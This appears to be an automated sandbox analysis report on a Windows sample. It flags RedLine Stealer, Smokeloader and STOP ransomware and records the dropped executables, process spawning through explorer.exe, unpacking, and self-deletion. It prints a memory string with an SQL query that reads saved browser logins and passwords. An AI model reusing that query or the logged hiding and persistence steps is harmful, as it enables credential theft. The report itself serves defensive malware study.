Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: String function: 0040EAC8 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: String function: 004097B4 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040EAB8 appears 38 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		0_2_0040156B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402241 NtQuerySystemInformation,		0_2_00402241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040224D NtQuerySystemInformation,		0_2_0040224D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402251 NtQuerySystemInformation,		0_2_00402251
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		0_2_00401577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402219 NtQuerySystemInformation,		0_2_00402219
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040221B NtQuerySystemInformation,		0_2_0040221B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection,		0_2_00401727
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		0_2_00401581
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		0_2_00401584
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,		0_2_00401587
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D7E5 __crt_waiting_on_module_handle,NtQuerySystemInformation,RtlEncodePointer,		0_2_0040D7E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C09D __setlocale_set_cat,NtQuerySystemInformation,_strpbrk,_strncmp,_strlen,_strcspn,__invoke_watson,__setlocale_set_cat,__expandlocale,__setlocale_set_cat,__setlocale_get_all,		0_2_0040C09D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D94C __crt_waiting_on_module_handle,NtQuerySystemInformation,__lock,__lock,___addlocaleref,		0_2_0040D94C

Source: file.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\thduhcf

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@24/24@23/11

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,

4_2_00404AE9

Source: file.exe	Virustotal: Detection: 38%
Source: file.exe	ReversingLabs: Detection: 43%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\thduhcf C:\Users\user\AppData\Roaming\thduhcf
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exe
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\7795.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
Source: C:\Users\user\AppData\Local\Temp\837D.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520
Source: unknown	Process created: C:\Users\user\AppData\Roaming\idduhcf C:\Users\user\AppData\Roaming\idduhcf
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exe
Source: C:\Users\user\AppData\Local\Temp\4316.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe			Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\6246.tmp

Jump to behavior

Source: 8C19.exe, 0000000A.00000003.503706148.0000000000665000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;

Source: 8C19.exe, 0000000A.00000003.543193997.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503664897.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503071576.00000000023B6000.00000004.00000020.00020000.00000000.sdmp, 6AB1.tmp.14.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008C6118 CreateToolhelp32Snapshot,Module32First,

0_2_008C6118

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4132
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2188

Source: C:\Users\user\AppData\Local\Temp\6246.exe	Command line argument: msimg32.dll		4_2_00404F07
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Command line argument: VVdO		4_2_00404F07
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Command line argument: 0cA		4_2_00416280

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6246.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8C19.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8C19.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
Source:	Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
Source:	Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
Source:	Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
Source:	Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
Source:	Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\thduhcf	Unpacked PE file: 5.2.thduhcf.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Unpacked PE file: 6.2.69A9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EAFD push ecx; ret		0_2_0040EB10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B3A3 push ecx; ret		0_2_0040B3B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004097A4 push eax; ret		0_2_004097C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C7321 push cs; retf		0_2_008C734C
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_004039AF push ecx; ret		4_2_004039B0
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0040EB0D push ecx; ret		4_2_0040EB20
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0040B3B3 push ecx; ret		4_2_0040B3C6
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_004097B4 push eax; ret		4_2_004097D2
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_009290AF push ecx; retf		4_2_009290B2

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,

4_2_004049EA

Persistence and Installation Behavior

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\idduhcf			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\thduhcf			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6246.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\thduhcf			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\837D.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7795.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8C19.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4316.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7AF0.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\idduhcf			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\69A9.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\thduhcf:Zone.Identifier read attributes | delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\idduhcf:Zone.Identifier read attributes | delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
